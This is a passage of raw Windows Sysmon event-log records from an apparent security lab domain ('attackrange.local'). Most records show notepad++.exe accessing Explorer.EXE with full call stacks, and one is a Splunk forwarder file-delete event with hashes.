Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81c2d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001046510Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.805{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81ba9|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 23542300x8000000000000000806366Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:38.020{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2253FBBC6832A5FEF3F9B7526A9321BB,SHA256=628C0A32B68F1A1A7E183B52443C57C584564AA75CA41773688F72719BD66BE8,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x80000000000000001046509Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.805{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001046508Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.805{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x80000000000000001046507Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.774{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81c2d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001046506Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.774{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81ba9|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001046505Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.774{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001046504Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.774{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x80000000000000001046503Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.774{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81c2d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001046502Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.774{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81ba9|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001046501Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.774{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001046500Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.774{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x80000000000000001046499Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.774{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81c2d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001046498Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.774{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81ba9|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001046497Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.774{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001046496Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.774{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\